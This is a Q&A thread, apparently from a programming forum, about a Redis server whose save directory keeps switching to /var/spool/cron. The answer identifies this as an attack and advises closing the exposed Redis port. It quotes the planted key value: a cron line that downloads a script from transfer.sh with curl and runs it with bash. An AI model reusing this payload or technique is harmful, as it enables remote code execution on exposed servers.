Menu
I have set up my redis-server so that CONFIG GET dir --> "/var/lib/redis" and CONFIG GET dbfilename --> "redis.rdb".
However, after my server has been running a few hours or a few days, I start getting the "Failed opening .rdb for saving: Permission denied" error.
If I again do CONFIG GET dir --> "/var/spool/cron" and CONFIG GET dbfilename --> "root". I have tried looking all over the place for some kind of understanding of what is happening, but without avail.
If I simply restart my redis-server, then the config is once again reset to the original settings that I set up in the "redis.conf" file.
745
This is indeed an attack. If you check your redis keys after this happens you will see few "string" keys like this: "Backup1", "Backup2", "Backup3".
The value of these will be something like this:
"\t\n*/2 * * * * curl -s https://transfer.sh/QMvW6/tmp.M8pAEgBA6T > .cmd && bash .cmd\n\t"
This is meant to modify your crontab.
Bottom line is - don't have redis port opened to the world.
124
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With
